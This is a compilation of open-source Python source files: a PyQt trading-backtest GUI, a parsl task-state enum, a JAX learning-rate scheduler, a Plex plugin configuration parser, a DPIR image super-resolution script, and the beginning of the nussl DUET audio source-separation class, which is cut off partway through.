self.date_from = self.shares_date_from.date().toPyDate()
self.date_to = self.shares_date_to.date().toPyDate()
def init_external_tab_ui(self):
"""External data."""
self.external_tab = QtGui.QWidget()
self.external_tab.setEnabled(False)
self.external_layout = QtGui.QVBoxLayout(self.external_tab)
self.import_data_name = QtGui.QLabel('Import External Data')
self.import_data_label = QtGui.QLabel('...')
self.import_data_btn = QtGui.QPushButton('Import')
self.import_data_btn.clicked.connect(self.open_file)
self.external_layout.addWidget(
self.import_data_name, 0, QtCore.Qt.AlignCenter
)
self.external_layout.addWidget(
self.import_data_label, 0, QtCore.Qt.AlignCenter
)
self.external_layout.addWidget(
self.import_data_btn, 0, QtCore.Qt.AlignCenter
)
self.select_source.addTab(self.external_tab, 'Custom data')
def init_shares_tab_ui(self):
"""Shares."""
self.shares_tab = QtGui.QWidget()
self.shares_layout = QtGui.QFormLayout(self.shares_tab)
today = datetime.today()
self.shares_date_from = QtGui.QDateEdit()
self.shares_date_from.setMinimumDate(QtCore.QDate(1900, 1, 1))
self.shares_date_from.setMaximumDate(QtCore.QDate(2030, 12, 31))
self.shares_date_from.setDate(QtCore.QDate(today.year, 1, 1))
self.shares_date_from.setDisplayFormat('dd.MM.yyyy')
self.shares_date_to = QtGui.QDateEdit()
self.shares_date_to.setMinimumDate(QtCore.QDate(1900, 1, 1))
self.shares_date_to.setMaximumDate(QtCore.QDate(2030, 12, 31))
self.shares_date_to.setDate(
QtCore.QDate(today.year, today.month, today.day)
)
self.shares_date_to.setDisplayFormat('dd.MM.yyyy')
self.shares_symbol_list = QtGui.QComboBox()
self.shares_symbol_list.setFocusPolicy(QtCore.Qt.StrongFocus)
self.shares_symbol_list.setMaxVisibleItems(20)
self.shares_symbol_list.setEditable(True)
self.shares_show_btn = QtGui.QPushButton('Load')
self.shares_show_btn.clicked.connect(self.update_data)
self.shares_layout.addRow('From', self.shares_date_from)
self.shares_layout.addRow('To', self.shares_date_to)
self.shares_layout.addRow('Symbol', self.shares_symbol_list)
self.shares_layout.addRow(None, self.shares_show_btn)
self.select_source.addTab(self.shares_tab, 'Shares/Futures/ETFs')
def on_symbols_loading(self):
self.shares_symbol_list.addItem('Loading...')
self.shares_symbol_list.setEnabled(False)
def on_symbols_loaded(self, symbols):
self.shares_symbol_list.clear()
self.shares_symbol_list.setEnabled(True)
# self.symbols = ['%s/%s' % (ticker, name) for ticker, name in symbols]
# self.shares_symbol_list.addItems(self.symbols)
model = QtGui.QStandardItemModel()
model.setHorizontalHeaderLabels(SYMBOL_COLUMNS)
for irow, (ticker, name) in enumerate(symbols):
model.setItem(irow, 0, QtGui.QStandardItem(ticker))
model.setItem(irow, 1, QtGui.QStandardItem(name))
table_view = QtGui.QTableView()
table_view.setModel(model)
table_view.setSelectionBehavior(QtGui.QAbstractItemView.SelectRows)
table_view.verticalHeader().setVisible(False)
table_view.setAutoScroll(False)
table_view.setShowGrid(False)
table_view.resizeRowsToContents()
table_view.setColumnWidth(0, 60)
table_view.setColumnWidth(1, 240)
table_view.setMinimumWidth(300)
completer = QtGui.QCompleter(model)
completer.setCaseSensitivity(QtCore.Qt.CaseInsensitive)
completer.setModel(model)
self.symbols = symbols
self.shares_symbol_list.setModel(model)
self.shares_symbol_list.setView(table_view)
self.shares_symbol_list.setCompleter(completer)
# set default symbol
self.shares_symbol_list.setCurrentIndex(
self.shares_symbol_list.findText(DEFAULT_TICKER)
)
def open_file(self):
filename = QtGui.QFileDialog.getOpenFileName(
parent=None,
caption='Open a source of data',
directory=QtCore.QDir.currentPath(),
filter='All (*);;Text (*.txt)',
)
self.import_data_label.setText('Loading %s' % filename)
with open(filename, 'r', encoding='utf-8') as f:
self.data = f.readlines()
def update_data(self, ticker=None):
ticker = ticker or self.shares_symbol_list.currentText()
self.symbol = Symbol(ticker=ticker, mode=Symbol.SHARES)
self.date_from = self.shares_date_from.date().toPyDate()
self.date_to = self.shares_date_to.date().toPyDate()
get_quotes(
symbol=self.symbol.ticker,
date_from=self.date_from,
date_to=self.date_to,
)
self.data_updated.emit(self.symbol)
class StrategyBoxWidget(QtGui.QGroupBox):
run_backtest = QtCore.pyqtSignal(object)
def __init__(self, parent=None):
super().__init__(parent)
self.setTitle('Strategy')
self.setAlignment(QtCore.Qt.AlignCenter)
self.layout = QtGui.QHBoxLayout(self)
self.layout.setContentsMargins(0, 0, 0, 0)
self.list = QtGui.QComboBox()
self.add_btn = QtGui.QPushButton('+')
self.add_btn.clicked.connect(self.add_strategies)
self.start_btn = QtGui.QPushButton('Start Backtest')
self.start_btn.clicked.connect(self.load_strategy)
self.layout.addWidget(self.list, stretch=2)
self.layout.addWidget(self.add_btn, stretch=0)
self.layout.addWidget(self.start_btn, stretch=0)
self.load_strategies_from_settings()
def reload_strategies(self):
"""Reload user's file to get actual version of the strategies."""
self.strategies = strategies_from_file(self.strategies_path)
def reload_list(self):
self.list.clear()
self.list.addItems([s.get_name() for s in self.strategies])
def load_strategies_from_settings(self):
filename = Settings.value('strategies/path', None)
if not filename or not os.path.exists(filename):
return
self.strategies_path = filename
self.reload_strategies()
self.reload_list()
def save_strategies_to_settings(self):
Settings.setValue('strategies/path', self.strategies_path)
def add_strategies(self):
filename, _filter = QtGui.QFileDialog.getOpenFileName(
self,
caption='Open Strategy.',
directory=QtCore.QDir.currentPath(),
filter='Python modules (*.py)',
)
if not filename:
return
self.strategies_path = filename
self.save_strategies_to_settings()
self.reload_strategies()
self.reload_list()
def load_strategy(self):
self.reload_strategies()
self.run_backtest.emit(self.strategies[self.list.currentIndex()])
class QuotesTabWidget(QtGui.QWidget):
def __init__(self, parent=None):
super().__init__(parent)
self.layout = QtGui.QVBoxLayout(self)
self.layout.setContentsMargins(0, 0, 0, 0)
self.toolbar_layout = QtGui.QHBoxLayout()
self.toolbar_layout.setContentsMargins(10, 10, 15, 0)
self.chart_layout = QtGui.QHBoxLayout()
self.init_timeframes_ui()
self.init_strategy_ui()
self.layout.addLayout(self.toolbar_layout)
self.layout.addLayout(self.chart_layout)
def init_timeframes_ui(self):
self.tf_layout = QtGui.QHBoxLayout()
self.tf_layout.setSpacing(0)
self.tf_layout.setContentsMargins(0, 12, 0, 0)
time_frames = ('1M', '5M', '15M', '30M', '1H', '1D', '1W', 'MN')
btn_prefix = 'TF'
for tf in time_frames:
btn_name = ''.join([btn_prefix, tf])
btn = QtGui.QPushButton(tf)
# TODO:
btn.setEnabled(False)
setattr(self, btn_name, btn)
self.tf_layout.addWidget(btn)
self.toolbar_layout.addLayout(self.tf_layout)
def init_strategy_ui(self):
self.strategy_box = StrategyBoxWidget(self)
self.toolbar_layout.addWidget(self.strategy_box)
def update_chart(self, symbol):
if not self.chart_layout.isEmpty():
self.chart_layout.removeWidget(self.chart)
self.chart = QuotesChart()
self.chart.plot(symbol)
self.chart_layout.addWidget(self.chart)
def add_signals(self):
self.chart.add_signals()
class EquityTabWidget(QtGui.QWidget):
def __init__(self, parent=None):
super().__init__(parent)
self.layout = QtGui.QHBoxLayout(self)
self.layout.setContentsMargins(0, 0, 0, 0)
def update_chart(self):
if not self.layout.isEmpty():
self.layout.removeWidget(self.chart)
self.chart = EquityChart()
self.chart.plot()
self.layout.addWidget(self.chart)
class ResultsTabWidget(QtGui.QWidget):
def __init__(self, parent=None):
super().__init__(parent)
self.layout = QtGui.QHBoxLayout(self)
self.layout.setContentsMargins(0, 0, 0, 0)
def update_table(self):
if not self.layout.isEmpty():
self.layout.removeWidget(self.table)
self.table = ResultsTable()
self.table.plot()
self.layout.addWidget(self.table)
class TradesTabWidget(QtGui.QWidget):
def __init__(self, parent=None):
super().__init__(parent)
self.layout = QtGui.QHBoxLayout(self)
self.layout.setContentsMargins(0, 0, 0, 0)
def update_table(self):
if not self.layout.isEmpty():
self.layout.removeWidget(self.table)
self.table = TradesTable()
self.table.plot()
self.layout.addWidget(self.table)
class OptimizationTabWidget(QtGui.QWidget):
optimization_done = QtCore.pyqtSignal()
def __init__(self, parent=None):
super().__init__(parent)
self.layout = QtGui.QVBoxLayout(self)
self.layout.setContentsMargins(0, 0, 0, 0)
self.table_layout = QtGui.QHBoxLayout()
self.top_layout = QtGui.QHBoxLayout()
self.top_layout.setContentsMargins(0, 10, 0, 0)
self.start_optimization_btn = QtGui.QPushButton('Start')
self.start_optimization_btn.clicked.connect(self.start_optimization)
self.top_layout.addWidget(
self.start_optimization_btn, alignment=QtCore.Qt.AlignRight
)
self.layout.addLayout(self.top_layout)
self.layout.addLayout(self.table_layout)
def update_table(self, strategy):
if not self.table_layout.isEmpty():
# close() to avoid an UI issue with duplication of the table
self.table.close()
self.table_layout.removeWidget(self.table)
self.table = OptimizationTable()
self.table.plot(strategy)
self.table_layout.addWidget(self.table)
def start_optimization(self, *args, **kwargs):
logger.debug('Start optimization')
self.table.optimize()
self.optimization_done.emit()
logger.debug('Optimization is done')
class OptimizatimizedResultsTabWidget(QtGui.QWidget):
def __init__(self, parent=None):
super().__init__(parent)
self.layout = QtGui.QHBoxLayout(self)
self.layout.setContentsMargins(0, 0, 0, 0)
self.table = OptimizatimizedResultsTable()
self.table.plot()
self.layout.addWidget(self.table)
class MainWidget(QtGui.QTabWidget):
def __init__(self, parent=None):
super().__init__(parent)
self.setDocumentMode(True)
self.data_tab = DataTabWidget(self)
self.data_tab.data_updated.connect(self._update_quotes_chart)
self.addTab(self.data_tab, 'Data')
def _add_quotes_tab(self):
if self.count() >= 2: # quotes tab is already exists
return
self.quotes_tab = QuotesTabWidget(self)
self.quotes_tab.strategy_box.run_backtest.connect(self._run_backtest)
self.addTab(self.quotes_tab, 'Quotes')
def _add_result_tabs(self):
if self.count() >= 3: # tabs are already exist
return
self.equity_tab = EquityTabWidget(self)
self.results_tab = ResultsTabWidget(self)
self.trades_tab = TradesTabWidget(self)
self.optimization_tab = OptimizationTabWidget(self)
self.optimization_tab.optimization_done.connect(
self._add_optimized_results
) # noqa
self.addTab(self.equity_tab, 'Equity')
self.addTab(self.results_tab, 'Results')
self.addTab(self.trades_tab, 'Trades')
self.addTab(self.optimization_tab, 'Optimization')
def _update_quotes_chart(self, symbol):
self._add_quotes_tab()
self.symbol = symbol
self.quotes_tab.update_chart(self.symbol)
self.setCurrentIndex(1)
def _run_backtest(self, strategy):
logger.debug('Run backtest')
Portfolio.clear()
stg = strategy(symbols=[self.symbol])
stg.run()
Portfolio.summarize()
self.quotes_tab.add_signals()
self._add_result_tabs()
self.equity_tab.update_chart()
self.results_tab.update_table()
self.trades_tab.update_table()
self.optimization_tab.update_table(strategy=stg)
logger.debug(
'Count positions in the portfolio: %d', Portfolio.position_count()
)
def _add_optimized_results(self):
self.addTab(OptimizatimizedResultsTabWidget(self), 'Optimized Results')
self.setCurrentIndex(self.count() - 1)
def plot_test_data(self):
logger.debug('Plot test data')
self.data_tab.update_data(ticker=DEFAULT_TICKER)
self.quotes_tab.strategy_box.load_strategy()
|
parsl/dataflow/states.py | cylondata/parsl | 323 | 47093 | from enum import IntEnum
class States(IntEnum):
"""Enumerates the states a parsl task may be in.
These states occur inside the task record for a task inside
a `DataFlowKernel` and in the monitoring database.
In a single successful task execution, tasks will progress in this
sequence:
pending -> launched -> running -> exec_done
Other states represent deviations from this path, either due to
failures, or to deliberate changes to how tasks are executed (for
example due to join_app, or memoization).
All tasks should end up in one of the states listed in `FINAL_STATES`.
"""
unsched = -1
pending = 0
"""Task is known to parsl but cannot run yet. Usually, a task cannot
run because it is waiting for dependency tasks to complete.
"""
running = 2
"""Task is running on a resource. This state is special - a DFK task
record never goes to States.running state; but the monitoring database
may represent a task in this state based on non-DFK information received
from monitor_wrapper."""
exec_done = 3
"""Task has been executed successfully."""
failed = 4
"""Task has failed and no more attempts will be made to run it."""
dep_fail = 5
"""Dependencies of this task failed, so it is marked as failed without
even an attempt to launch it."""
launched = 7
"""Task has been passed to a `ParslExecutor` for execution."""
fail_retryable = 8
"""Task has failed, but can be retried"""
memo_done = 9
"""Task was found in the memoization table, so it is marked as done
without even an attempt to launch it."""
joining = 10
"""Task is a join_app, joining on internal tasks. The task has run its
own Python code, and is now waiting on other tasks before it can make
further progress (to a done/failed state)."""
FINAL_STATES = [States.exec_done, States.memo_done, States.failed, States.dep_fail]
"""States from which we will never move to another state, because the job has
either definitively completed or failed."""
FINAL_FAILURE_STATES = [States.failed, States.dep_fail]
"""States which are final and which indicate a failure. This must
be a subset of FINAL_STATES"""
|
data_selection/wmt/common.py | DionysisChristopoulos/google-research | 23,901 | 47098 | # coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Common code from different mains."""
import jax.numpy as jnp
import numpy as np
STEPS_PER_EPOCH = 4500
def create_learning_rate_scheduler(
factors='constant * linear_warmup * rsqrt_decay',
base_learning_rate=0.5,
warmup_steps=1000,
decay_factor=0.5,
steps_per_decay=20000,
steps_per_cycle=100000,
init_step=0,
finetune_lr=False):
"""Creates learning rate schedule.
Interprets factors in the factors string which can consist of:
* constant: interpreted as the constant value,
* linear_warmup: interpreted as linear warmup until warmup_steps,
* rsqrt_decay: divide by square root of max(step, warmup_steps)
* rsqrt_normalized_decay: divide by square root of max(step/warmup_steps, 1)
* decay_every: Every k steps decay the learning rate by decay_factor.
* cosine_decay: Cyclic cosine decay, uses steps_per_cycle parameter.
Args:
factors: string, factors separated by "*" that defines the schedule.
base_learning_rate: float, the starting constant for the lr schedule.
warmup_steps: int, how many steps to warm up for in the warmup schedule.
decay_factor: float, the amount to decay the learning rate by.
steps_per_decay: int, how often to decay the learning rate.
steps_per_cycle: int, steps per cycle when using cosine decay.
init_step: int, first step of this run. Used with finetune_lr
finetune_lr: bool, modify step count for finetuning smaller datasets
Returns:
a function learning_rate(step): float -> {"learning_rate": float}, the
step-dependent lr.
"""
factors = [n.strip() for n in factors.split('*')]
def step_fn(step):
"""Step to learning rate function."""
ret = 1.0
if finetune_lr:
steps_this_run = step - init_step
multiplier = STEPS_PER_EPOCH / steps_per_cycle
finetune_steps = steps_this_run * multiplier
step = init_step + finetune_steps
for name in factors:
if name == 'constant':
ret *= base_learning_rate
elif name == 'linear_warmup':
ret *= jnp.minimum(1.0, step / warmup_steps)
elif name == 'rsqrt_decay':
ret /= jnp.sqrt(jnp.maximum(step, warmup_steps))
elif name == 'rsqrt_normalized_decay':
ret *= jnp.sqrt(warmup_steps)
ret /= jnp.sqrt(jnp.maximum(step, warmup_steps))
elif name == 'decay_every':
ret *= (decay_factor**(step // steps_per_decay))
elif name == 'cosine_decay':
progress = jnp.maximum(0.0,
(step - warmup_steps) / float(steps_per_cycle))
ret *= jnp.maximum(0.0,
0.5 * (1.0 + jnp.cos(jnp.pi * (progress % 1.0))))
else:
raise ValueError('Unknown factor %s.' % name)
return jnp.asarray(ret, dtype=jnp.float32)
return step_fn
def pad_examples(x, desired_batch_size):
"""Expand batch to desired size by repeating last slice."""
batch_pad = desired_batch_size - x.shape[0]
return np.concatenate([x, np.tile(x[-1], (batch_pad, 1))], axis=0)
def tohost(x):
"""Collect batches from all devices to host and flatten batch dimensions."""
n_device, n_batch, *remaining_dims = x.shape
return np.array(x).reshape((n_device * n_batch,) + tuple(remaining_dims))
|
Trakttv.bundle/Contents/Libraries/Shared/plugin/core/configuration.py | disrupted/Trakttv.bundle | 1,346 | 47116 | from plugin.core.environment import Environment
from ConfigParser import NoOptionError, NoSectionError, ParsingError, SafeConfigParser
import logging
import os
log = logging.getLogger(__name__)
CONFIGURATION_FILES = [
'advanced'
]
class ConfigurationFile(object):
def __init__(self, path):
self._path = path
self._relpath = os.path.relpath(self._path, Environment.path.plugin_support)
self._parser = None
self._error = False
def __getitem__(self, section):
# Ensure file is loaded
self.load()
# Construct section
return ConfigurationSection(self._parser, section)
def load(self):
if self._parser or self._error:
return
log.debug('Parsing configuration file: %r', self._relpath)
try:
self._parser = SafeConfigParser()
self._parser.read(self._path)
except ParsingError as ex:
log.info(ex.message)
self._parser = None
self._error = True
except Exception as ex:
log.warn('Unable to parse configuration file: %r - %s', self._relpath, ex, exc_info=True)
self._parser = None
self._error = True
class ConfigurationSection(object):
def __init__(self, parser, name):
self._parser = parser
self._name = name
def _get(self, func, key, default=None):
if not self._parser:
return default
if not self._parser.has_option(self._name, key):
return default
try:
return getattr(self._parser, func)(self._name, key)
except (NoSectionError, NoOptionError):
return default
def get(self, key, default=None):
return self._get('get', key, default)
def get_int(self, key, default=None):
return self._get('getint', key, default)
def get_float(self, key, default=None):
return self._get('getfloat', key, default)
def get_boolean(self, key, default=None):
return self._get('getboolean', key, default)
def __getitem__(self, key):
if not self._parser:
return None
return self._parser.get(self._name, key)
def __setitem__(self, key, value):
if not self._parser:
return
self._parser.set(self._name, key, value)
class ConfigurationMeta(type):
def __new__(cls, name, parents, dct):
# Load configuration files
for name in CONFIGURATION_FILES:
# Build path
path = os.path.join(Environment.path.plugin_data, '%s.ini' % name)
# Parse configuration file
dct[name] = ConfigurationFile(path)
# Construct object
return super(ConfigurationMeta, cls).__new__(cls, name, parents, dct)
class Configuration(object):
__metaclass__ = ConfigurationMeta
advanced = None
|
main_dpir_sisr_real_applications.py | HedgehogCode/DPIR | 328 | 47159 | <reponame>HedgehogCode/DPIR<filename>main_dpir_sisr_real_applications.py
import os.path
import glob
import cv2
import logging
import time
import numpy as np
from datetime import datetime
from collections import OrderedDict
import hdf5storage
import torch
from utils import utils_deblur
from utils import utils_logger
from utils import utils_model
from utils import utils_pnp as pnp
from utils import utils_sisr as sr
from utils import utils_image as util
"""
Spyder (Python 3.7)
PyTorch 1.6.0
Windows 10 or Linux
<NAME> (<EMAIL>)
github: https://github.com/cszn/DPIR
https://github.com/cszn/IRCNN
https://github.com/cszn/KAIR
@article{zhang2020plug,
title={Plug-and-Play Image Restoration with Deep Denoiser Prior},
author={<NAME> <NAME> <NAME> <NAME>, <NAME>},
journal={arXiv preprint},
year={2020}
}
% If you have any question, please feel free to contact with me.
% <NAME> (e-mail: <EMAIL>; homepage: https://cszn.github.io/)
by <NAME> (01/August/2020)
# --------------------------------------------
|--model_zoo # model_zoo
|--drunet_gray # model_name, for color images
|--drunet_color
|--testset # testsets
|--results # results
# --------------------------------------------
"""
def main():
"""
# ----------------------------------------------------------------------------------
# In real applications, you should set proper
# - "noise_level_img": from [3, 25], set 3 for clean image, try 15 for very noisy LR images
# - "k" (or "kernel_width"): blur kernel is very important!!! kernel_width from [0.6, 3.0]
# to get the best performance.
# ----------------------------------------------------------------------------------
"""
##############################################################################
testset_name = 'Set3C' # set test set, 'set5' | 'srbsd68'
noise_level_img = 3 # set noise level of image, from [3, 25], set 3 for clean image
model_name = 'drunet_color' # 'ircnn_color' # set denoiser, | 'drunet_color' | 'ircnn_gray' | 'drunet_gray' | 'ircnn_color'
sf = 2 # set scale factor, 1, 2, 3, 4
iter_num = 24 # set number of iterations, default: 24 for SISR
# --------------------------------
# set blur kernel
# --------------------------------
kernel_width_default_x1234 = [0.6, 0.9, 1.7, 2.2] # Gaussian kernel widths for x1, x2, x3, x4
noise_level_model = noise_level_img/255. # noise level of model
kernel_width = kernel_width_default_x1234[sf-1]
"""
# set your own kernel width !!!!!!!!!!
"""
# kernel_width = 1.0
k = utils_deblur.fspecial('gaussian', 25, kernel_width)
k = sr.shift_pixel(k, sf) # shift the kernel
k /= np.sum(k)
##############################################################################
show_img = False
util.surf(k) if show_img else None
x8 = True # default: False, x8 to boost performance
modelSigma1 = 49 # set sigma_1, default: 49
modelSigma2 = max(sf, noise_level_model*255.)
classical_degradation = True # set classical degradation or bicubic degradation
task_current = 'sr' # 'sr' for super-resolution
n_channels = 1 if 'gray' in model_name else 3 # fixed
model_zoo = 'model_zoo' # fixed
testsets = 'testsets' # fixed
results = 'results' # fixed
result_name = testset_name + '_realapplications_' + task_current + '_' + model_name
model_path = os.path.join(model_zoo, model_name+'.pth')
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
torch.cuda.empty_cache()
# ----------------------------------------
# L_path, E_path, H_path
# ----------------------------------------
L_path = os.path.join(testsets, testset_name) # L_path, for Low-quality images
E_path = os.path.join(results, result_name) # E_path, for Estimated images
util.mkdir(E_path)
logger_name = result_name
utils_logger.logger_info(logger_name, log_path=os.path.join(E_path, logger_name+'.log'))
logger = logging.getLogger(logger_name)
# ----------------------------------------
# load model
# ----------------------------------------
if 'drunet' in model_name:
from models.network_unet import UNetRes as net
model = net(in_nc=n_channels+1, out_nc=n_channels, nc=[64, 128, 256, 512], nb=4, act_mode='R', downsample_mode="strideconv", upsample_mode="convtranspose")
model.load_state_dict(torch.load(model_path), strict=True)
model.eval()
for _, v in model.named_parameters():
v.requires_grad = False
model = model.to(device)
elif 'ircnn' in model_name:
from models.network_dncnn import IRCNN as net
model = net(in_nc=n_channels, out_nc=n_channels, nc=64)
model25 = torch.load(model_path)
former_idx = 0
logger.info('model_name:{}, image sigma:{:.3f}, model sigma:{:.3f}'.format(model_name, noise_level_img, noise_level_model))
logger.info('Model path: {:s}'.format(model_path))
logger.info(L_path)
L_paths = util.get_image_paths(L_path)
for idx, img in enumerate(L_paths):
# --------------------------------
# (1) get img_L
# --------------------------------
logger.info('Model path: {:s} Image: {:s}'.format(model_path, img))
img_name, ext = os.path.splitext(os.path.basename(img))
img_L = util.imread_uint(img, n_channels=n_channels)
img_L = util.uint2single(img_L)
img_L = util.modcrop(img_L, 8) # modcrop
# --------------------------------
# (2) get rhos and sigmas
# --------------------------------
rhos, sigmas = pnp.get_rho_sigma(sigma=max(0.255/255., noise_level_model), iter_num=iter_num, modelSigma1=modelSigma1, modelSigma2=modelSigma2, w=1)
rhos, sigmas = torch.tensor(rhos).to(device), torch.tensor(sigmas).to(device)
# --------------------------------
# (3) initialize x, and pre-calculation
# --------------------------------
x = cv2.resize(img_L, (img_L.shape[1]*sf, img_L.shape[0]*sf), interpolation=cv2.INTER_CUBIC)
if np.ndim(x)==2:
x = x[..., None]
if classical_degradation:
x = sr.shift_pixel(x, sf)
x = util.single2tensor4(x).to(device)
img_L_tensor, k_tensor = util.single2tensor4(img_L), util.single2tensor4(np.expand_dims(k, 2))
[k_tensor, img_L_tensor] = util.todevice([k_tensor, img_L_tensor], device)
FB, FBC, F2B, FBFy = sr.pre_calculate(img_L_tensor, k_tensor, sf)
# --------------------------------
# (4) main iterations
# --------------------------------
for i in range(iter_num):
print('Iter: {} / {}'.format(i, iter_num))
# --------------------------------
# step 1, FFT
# --------------------------------
tau = rhos[i].float().repeat(1, 1, 1, 1)
x = sr.data_solution(x, FB, FBC, F2B, FBFy, tau, sf)
if 'ircnn' in model_name:
current_idx = np.int(np.ceil(sigmas[i].cpu().numpy()*255./2.)-1)
if current_idx != former_idx:
model.load_state_dict(model25[str(current_idx)], strict=True)
model.eval()
for _, v in model.named_parameters():
v.requires_grad = False
model = model.to(device)
former_idx = current_idx
# --------------------------------
# step 2, denoiser
# --------------------------------
if x8:
x = util.augment_img_tensor4(x, i % 8)
if 'drunet' in model_name:
x = torch.cat((x, sigmas[i].repeat(1, 1, x.shape[2], x.shape[3])), dim=1)
x = utils_model.test_mode(model, x, mode=2, refield=64, min_size=256, modulo=16)
elif 'ircnn' in model_name:
x = model(x)
if x8:
if i % 8 == 3 or i % 8 == 5:
x = util.augment_img_tensor4(x, 8 - i % 8)
else:
x = util.augment_img_tensor4(x, i % 8)
# --------------------------------
# (3) img_E
# --------------------------------
img_E = util.tensor2uint(x)
util.imsave(img_E, os.path.join(E_path, img_name+'_x'+str(sf)+'_'+model_name+'.png'))
if __name__ == '__main__':
main()
|
nussl/separation/spatial/duet.py | ZhaoJY1/nussl | 259 | 47189 | import numpy as np
from scipy import signal
from .. import MaskSeparationBase
from ...core import utils
from ...core import constants
class Duet(MaskSeparationBase):
"""
The DUET algorithm was originally proposed by S.Rickard and F.Dietrich for DOA
estimation and further developed for BSS and demixing by <NAME>, S.Rickard,
and <NAME>.
DUET extracts sources using the symmetric attenuation and relative delay between
two channels. The symmetric attenuation is calculated from the ratio of the two
channels' stft amplitudes, and the delay is the arrival delay between the two
sensors used to record the audio signal. These two values are clustered as peaks on
a histogram to determine where each source occurs. This implementation of DUET
creates and returns Mask objects after the run() function, which can then be
applied to the original audio signal to extract each individual source.
References:
[1] Rickard, Scott. "The DUET blind source separation algorithm."
Blind Speech Separation. Springer Netherlands, 2007. 217-241.
[2] Yilmaz, Ozgur, and <NAME>. "Blind separation of speech mixtures
via time-frequency masking."
Signal Processing, IEEE transactions on 52.7 (2004): 1830-1847.
Args:
input_audio_signal (np.array): a 2-row Numpy matrix containing samples of the
two-channel mixture.
num_sources (int): Number of sources to find.
attenuation_min (int): Minimum distance in utils.find_peak_indices, change if
not enough peaks are identified.
attenuation_max (int): Used for creating a histogram without outliers.
num_attenuation_bins (int): Number of bins for attenuation.
delay_min (int): Lower bound on delay, used as minimum distance in
utils.find_peak_indices.
delay_max (int): Upper bound on delay, used for creating a histogram without
outliers.
num_delay_bins (int): Number of bins for delay.
peak_threshold (float): Value in [0, 1] for peak picking.
attenuation_min_distance (int): Minimum distance between peaks wrt attenuation.
delay_min_distance (int): Minimum distance between peaks wrt delay.
p (int): Weight the histogram with the symmetric attenuation estimator.
q (int): Weight the histogram with the delay estimato
Notes:
On page 8 of his paper, Rickard recommends p=1 and q=0 as a default starting
point and p=.5, q=0 if one source is more dominant.
Attributes:
stft_ch0 (np.array): A Numpy matrix containing the stft data of channel 0.
stft_ch1 (np.array): A Numpy matrix containing the stft data of channel 1.
frequency_matrix (np.array): A Numpy matrix containing the frequencies of
analysis.
symmetric_atn (np.array): A Numpy matrix containing the symmetric attenuation
between the two channels.
delay (np.array): A Numpy matrix containing the delay between the two channels.
num_time_bins (np.array): The number of time bins for the frequency matrix and
mask arrays.
num_frequency_bins (int): The number of frequency bins for the mask arrays.
attenuation_bins (int): A Numpy array containing the attenuation bins for the
histogram.
delay_bins (np.array): A Numpy array containing the delay bins for the histogram.
normalized_attenuation_delay_histogram (np.array): A normalized Numpy matrix
containing the attenuation delay histogram, which has peaks for each source.
attenuation_delay_histogram (np.array): A non-normalized Numpy matrix containing
the attenuation delay histogram, which has peaks for each source.
peak_indices (np.array): A Numpy array containing the indices of the peaks for
the histogram.
separated_sources (np.array): A Numpy array of arrays containing each
separated source.
"""
def __init__(self, input_audio_signal, num_sources,
attenuation_min=-3, attenuation_max=3, num_attenuation_bins=50,
delay_min=-3, delay_max=3, num_delay_bins=50,
peak_threshold=0.0, attenuation_min_distance=5, delay_min_distance=5,
p=1, q=0, mask_type='binary'):
super().__init__(
input_audio_signal=input_audio_signal,
mask_type=mask_type)
self.num_sources = num_sources
self.attenuation_min = attenuation_min
self.attenuation_max = attenuation_max
self.num_attenuation_bins = num_attenuation_bins
self.delay_min = delay_min
self.delay_max = delay_max
self.num_delay_bins = num_delay_bins
self.peak_threshold = peak_threshold
self.attenuation_min_distance = attenuation_min_distance
self.delay_min_distance = delay_min_distance
self.p = p
self.q = q
self.stft_ch0 = None
self.stft_ch1 = None
self.frequency_matrix = None
self.symmetric_atn = None
self.delay = None
self.num_time_bins = None
self.num_frequency_bins = None
self.attenuation_bins = None
self.delay_bins = None
self.normalized_attenuation_delay_histogram = None
self.attenuation_delay_histogram = None
self.peak_indices = None
self.delay_peak = None
self.atn_peak = None
self.separated_sources = None
def run(self):
""" Extracts N sources from a given stereo audio mixture (N sources captured via 2 sensors)
Returns:
computed_masks (np.array): A list of binary mask objects that can be used to extract the sources
Example:
.. code-block:: python
:linenos:
#Import input audio signal
input_file_name = '../Input/dev1_female3_inst_mix.wav'
signal = AudioSignal(path_to_input_file=input_file_name)
# Set up and run Duet
duet = Duet(signal, a_min=-3, a_max=3, a_num=50, d_min=-3, d_max=3, d_num=50, threshold=0.2,
a_min_distance=5, d_min_distance=5, num_sources=3)
duet.run()
# plot histogram results
duet.plot(os.path.join('..', 'Output', 'duet_2d.png'))
duet.plot(os.path.join('..', 'Output', 'duet_3d.png'), three_d_plot=True)
# Create output file for each source found
output_name_stem = os.path.join('..', 'Output', 'duet_source')
i = 1
for s in duet.make_audio_signals():
output_file_name = f"{output_name_stem}{i}.wav"
s.write_audio_to_file(output_file_name)
i += 1
"""
self.result_masks = []
# Calculate the stft of both channels and create the frequency matrix (the matrix containing the
# frequencies of analysis of the Fourier transform)
self.stft_ch0, self.stft_ch1, self.frequency_matrix = self._compute_spectrogram(
self.sample_rate)
# Calculate the symmetric attenuation (alpha) and delay (delta) for each
# time-freq. point and return a matrix for each
self.symmetric_atn, self.delay = self._compute_atn_delay(
self.stft_ch0, self.stft_ch1, self.frequency_matrix)
# Make histogram of attenuation-delay values and get the center values for the bins in this histogram
self.normalized_attenuation_delay_histogram, self.attenuation_bins, self.delay_bins = (
self._make_histogram()
)
# Find the location of peaks in the attenuation-delay plane
self.peak_indices = utils.find_peak_indices(
self.normalized_attenuation_delay_histogram, self.num_sources,
threshold=self.peak_threshold,
min_dist=[self.attenuation_min_distance, self.delay_min_distance])
# compute delay_peak, attenuation peak, and attenuation/delay estimates
self.delay_peak, atn_delay_est, self.atn_peak = self._convert_peaks(
self.peak_indices)
# compute masks for separation
computed_masks = self._compute_masks()
return computed_masks
def _compute_spectrogram(self, sample_rate):
""" Creates the STFT matrices for channel 0 and 1, and computes the frequency matrix.
Parameter:
sample_rate (integer): sample rate
Returns:
stft_ch0 (np.matrix): a 2D Numpy matrix containing the stft of channel 0
stft_ch1 (np.matrix): a 2D Numpy matrix containing the stft of channel 1
